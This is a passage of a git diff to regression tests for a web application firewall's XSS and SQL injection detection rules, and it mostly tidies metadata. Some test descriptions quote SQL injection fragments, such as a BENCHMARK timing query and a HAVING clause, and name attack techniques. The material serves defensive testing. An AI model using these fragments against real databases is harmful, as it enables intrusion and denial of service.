a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Walter Hop, azurit" - description: None tests: - test_id: 1 desc: "XSS Filter - Category 2: Event Handler Vector" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 4a053dcd1..c6190136a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Christian Folini, azurit" - description: "Tests to trigger, or not trigger 941130" rule_id: 941130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml index 0bf49cdb2..bcebadd21 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941130" rule_id: 941140 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml index e24ca1ea8..847216a7e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941150" rule_id: 941150 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml index 474294e41..5f5121ac2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, Walter Hop, Xhoenix, azurit" - description: "Tests to trigger, or not trigger 941160" rule_id: 941160 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml index 0b9f50040..778e7cf57 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Tests to trigger, or not trigger 941170" rule_id: 941170 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index 198966a9c..a6a7c74f4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941180" rule_id: 941180 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index 7daab475b..ff7471614 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, azurit" - description: "Tests to trigger, or not trigger 941180" rule_id: 941181 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 4312b627b..d41e2d48b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Tests to trigger, or not trigger 941190" rule_id: 941190 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml index 039398355..26ee42f8e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941200" rule_id: 941200 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml index 7d98bc6eb..23cbfc407 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml @@ -1,7 +1,7 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941210. This checks for abuses of javascript: with different encodings/html etc" + description: "This checks for abuses of javascript: with different encodings/html etc" rule_id: 941210 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml index 1fba86ff7..724283088 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index da266e23a..3778f0162 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml index 78f92348d..9dbc15bcb 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index ff2d60e4e..176876cdf 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index ba6208417..bd09168ad 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index cb30bdd5a..b1239a7a0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml index 15c6eddfe..d1b0a149e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 073fa65ef..679fa5e6e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index 78cd01227..f725188c4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "XSS Attack - HTML Tag Handler" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml index aefc13977..a5509fd74 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters - Attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index d5c5238c6..61dcf4817 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "IE XSS Filters - Attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 39834ce0d..97a14eb20 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -1,7 +1,6 @@ --- meta: author: "fgsch, azurit" - description: Test rule 941350 rule_id: 941350 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index b09904023..ad7f1ed67 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian Folini, azurit" - description: None tests: - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 36c8ee81b..91fb0cd18 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -1,7 +1,6 @@ --- meta: author: "Andrea Menin, azurit" - description: None tests: - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index b5aa4b1c6..be8d0234b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -1,7 +1,6 @@ --- meta: author: "Franziska Buehler, azurit" - description: None tests: - test_id: 1 desc: "AngularJS client side template injection detection" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index 2db0965f6..61cd7bd18 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -1,7 +1,6 @@ --- meta: author: "Franziska Buehler, Xhoenix, azurit" - description: None tests: - test_id: 1 desc: "JavaScript method setInterval(code, 1)" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index 0ded97033..ee9939f62 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -1,7 +1,6 @@ --- meta: author: "Andrea Menin, azurit" - description: None tests: - test_id: 1 desc: "JavaScript function without parentheses" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index 2fbb65a60..8d126d024 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None tests: - test_id: 1 - test_id: 1 diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index ce94374b6..9c237d09a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index 03dad9402..ffb58f6d1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None tests: - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index fb27be346..3b3cfe354 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 114ff39c9..6144f707b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -1,7 +1,6 @@ --- meta: author: "Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index 5969385cb..769080342 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "basic SQL authentication bypass" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml index e0bf51517..41ae47c46 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "MSSQL code execution and information gathering attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml index 2ead47298..e8daad8cb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "comment-/space-obfuscated injections and backtick termination" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml index e319114a8..42a96fdb4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None +rule_id: 942210 tests: - test_id: 1 desc: "Detects chained SQL injection attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml index 6f9b55bb2..c9fdd4047 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "Integer overflow taken from skipfish" @@ -14,7 +13,6 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - # NB: not sure about rule 942220 uri: "/get?string_to_convert=4294967296" version: HTTP/1.0 output: diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml index d2960f380..f77654ff0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "conditional SQL injection attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml index 5dea6a808..19fcf99aa 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christoph Hansen, azurit" - description: None tests: - test_id: 1 desc: "Detects MySQL charset switch and MSSQL DoS attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml index 936ffdba4..02bad099f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml @@ -1,10 +1,10 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942250 tests: - test_id: 1 - desc: "MATCH AGAINST, MERGE and EXECUTE IMMEDIATE injection" + desc: "Find EXECUTE IMMEDIATE injection" stages: - input: dest_addr: 127.0.0.1 diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml index fbeb2266f..1ac718e6f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml @@ -1,7 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" - description: None +rule_id: 942251 tests: - test_id: 1 desc: "Detects having injections: ' HAVING COUNT(CustomerID) > 5'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index ae40a6316..82641f3a8 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christian Folini, azurit" - description: None +rule_id: 942260 tests: - test_id: 1 desc: "Basic SQL authentication bypass" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index 29ca64a2d..0afc59e87 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942270 tests: - test_id: 1 desc: "basic sql injection. Common attack string for mysql, oracle and others" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index ce9285872..07d1d74fb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942280 tests: - test_id: 1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index dff5dc4be..bac70548f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 942290 tests: - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index 3b9211975..4d19c2760 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None +rule_id: 942300 tests: - test_id: 1 desc: "MySQL comments, conditions and ch(a)r injectionss" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 912eb148f..e198085a0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942310 tests: - test_id: 1 desc: | diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 1aa3fec41..59c8ca3dd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None +rule_id: 942320 tests: - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index a66288111..5a111a28a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" +rule_id: 942321 tests: - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 064895736..5f3f31499 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942330 tests: - test_id: 1 desc: "classic SQL injection probings 1/3" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index aaa462b99..88a871dbf 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942340 tests: - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 76b28ded2..7934f55fc 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None +rule_id: 942350 tests: - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 9b3df9409..3631ba1b1 100644 --- 